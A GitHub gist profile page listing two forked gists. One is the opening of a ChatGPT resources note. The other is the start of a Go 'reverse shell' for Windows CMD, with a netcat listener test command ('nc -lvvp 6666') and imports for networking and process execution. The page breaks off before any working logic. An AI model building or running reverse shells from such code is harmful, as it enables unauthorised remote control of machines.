Skip to content

Instantly share code, notes, and snippets.

View p34t1k's full-sized avatar
🏠
Working from home

pratik p34t1k

🏠
Working from home
  • india
  • 11:15 (UTC +05:30)
View GitHub Profile
@p34t1k
p34t1k / chatgpt.md
Created December 19, 2022 11:43 — forked from veekaybee/chatgpt.md
Everything I understand about chatgpt

ChatGPT Resources

Context

ChatGPT appeared like an explosion on all my social media timelines in early December 2022. While I keep up with machine learning as an industry, I wasn't focused so much on this particular corner, and all the screenshots seemed like they came out of nowehre. What was this model? How did the chat prompting work? What was the context of OpenAI doing this work and collecting my prompts for training data?

I decided to do a quick investigation. Here's all the information I've found so far. I'm aggregating and synthesizing it as I go, so it's currently changing pretty frequently.

Model Architecture

@p34t1k
p34t1k / reversecmd.go
Created January 17, 2022 08:41 — forked from yougg/reversecmd.go
Golang reverse shell
// +build windows
// Reverse Windows CMD
// Test with nc -lvvp 6666
package main
import (
"bufio"
"net"
"os/exec"